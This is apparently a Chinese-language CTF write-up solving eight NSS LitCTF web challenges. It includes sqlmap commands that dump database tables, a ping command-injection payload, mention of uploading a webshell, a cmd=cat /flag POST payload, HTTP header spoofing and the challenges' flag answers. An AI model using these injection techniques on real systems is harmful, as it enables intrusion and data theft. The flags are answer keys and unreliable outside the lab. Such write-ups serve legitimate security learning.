您现在的位置是：首页 >技术交流 >NSS LitCTF Web 部分wp网站首页技术交流

目录

1、PHP是世界上最好的语言！！

2、这是什么？SQL ！注一下 ！

3、Ping

4、作业管理系统

5、我Flag呢？

6、1zjs

7、Vim yyds

8、Http pro max plus

---

1、PHP是世界上最好的语言！！

直接cat flag

flag=NSSCTF{11eaebe0-3764-410d-be83-b23532a24235}

system() 函数用来执行 command 参数所指定的命令， 并且输出执行结果，PHP执行系统命令的常用的函数还有:exec函数、popen函数,passthru函数(完整的返回字符串，且不经过不必要的其它中间的输出界面,即获取一个命令未经任何处理的原始输出),shell_exec函数他们都可以执行系统命令。

system语法: string system(string command, int [return_var]);若是 return_var 参数存在，则执行 command 之后的状态会填入 return_var 中。

2、这是什么？SQL ！注一下 ！

 直接查询，发现注入点是id

使用sqlmap列出所以数据库

sqlmap -u "http://node1.anna.nssctf.cn:28755//?id=1" --dbs

available databases [6]: [*] ctf [*] ctftraining [*] information_schema [*] mysql [*] performance_schema [*] test

列出指定数据库的表

第一个里面没什么发现，在第二个库里面看到flag字样

sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining --tables

继续列出指定表的字段 

sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining -T flag --columns

 

获取指定字段中的数据

sqlmap -u "http://node1.anna.nssctf.cn:28755/?id=1" -D ctftraining -T flag -C flag --dump

NSSCTF{759de34b-d02a-4781-a33c-113aba994a10}

总结一些sqlmap常用的参数：

-D 选择使用哪个数据库

-T 选择使用哪个表

-C 选择使用哪个列

--tables 列出当前的表

--columns 列出当前的列

--dump 获取字段中的数据

3、Ping

直接在页面执行ping再带一个其他命令, 127.0.0.1&&ls，发现不行

使用bp抓包重发

 添加../逐级展开上级目录

 

 

  可以看到flag就是在根目录下的flag目录，直接使用cat命令获取

 

 除了展开，也可以先使用find命令，尝试查找flag

command=127.0.0.1 || find / -name flag* &ping=Ping

 再使用cat命令获取

flag=NSSCTF{3ce5e885-66ee-4312-828a-bfbb78c8cea8}

本题总结：

1、find命令：find /（查找范围） -name 查找关键字

find / -name flag* &ping=Ping中，

星号是一个通配符，表示任意数量的任意字符，当不知道真正字符完整名字时，进行模糊搜索。

2、cat命令用法总结：

① 只查看文件内容 cat a.txt

② 查找文件中的内容 cat a.txt | grep cc

③ 利用cat创建文件、向文件中写入内容、修改文件内容或者清空文件内容

 其中EOF是告诉 bash 哪个符号代表文件结束，也可以使用自己习惯的符号。

4、作业管理系统

在源码中找到默认登录账户和密码

  

直接安排一句话木马

 没有任何的绕过

 

 在根目录下找到flag

 flag=NSSCTF{96cd0bd4-f5e6-4fbf-8b09-c38f244d4aa6}

5、我Flag呢？

在源码里找到被注释掉的flag

 

6、1zjs

 玩了会儿魔方

 直接搜索一些关键字并没有什么发现，根据题目提示，在它的js文件里寻找

找到一个被注释掉的路径 /f@k3f1ag.php，直接访问

 查了一下这个叫jsfuck编码

有两种解密方法:

1、在浏览器的控制台

 2、使用在线网站解密

7、Vim yyds

查看源码并没有什么发现

 知识基础：

当我们非正常关闭vim编辑器时（比如直接关闭终端或者电脑断电），会生成一个.swp文件，这个文件是一个临时交换文件，用来备份缓冲区中的内容；

意外退出时，并不会覆盖旧的交换文件，而是会重新生成新的交换文件。而原来的文件中并不会有这次的修改，文件内容还是和打开时一样；

如果你并没有对文件进行修改，而只是读取文件，是不会产生.swp文件的；

可以使用 vim -r 来查看当前目录下的所有swp文件；

也可以使用 vim -r filename 来恢复文件，这样上次意外退出没有保存的修改，就会覆盖文件。

访问.index.php.swp将文件下载下来

因为我win里面没vim，将文件发到centos里

 

直接查看

 使用vim -r index.php.swp恢复文件

恢复后如下

 代码审计：

给password传入"Give_Me_Your_Flag"且要先经过base64编码

就会输出Oh You got my password！并且调用system函数执行传入的cmd命令

先将字符串base64编码

 构造payload

post：password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&&cmd=cat /flag

 NSSCTF{b8776bdb-b398-4544-b006-72ee55c5a531}

8、Http pro max plus

使用bp抓包改包重发

 请求头写 x-forwarded-for: 127.0.0.1

 

换一种 client-ip: 127.0.0.1

 请求头写 referer: pornhub.com

 请求头写 user-agent: Chrome

 请求头写 via: Clash.win

 拿到一个路径，直接访问它

 在源码里找到了另一个路径，继续访问

 NSSCTF{d295698b-50ae-47ed-8393-2463797931d3}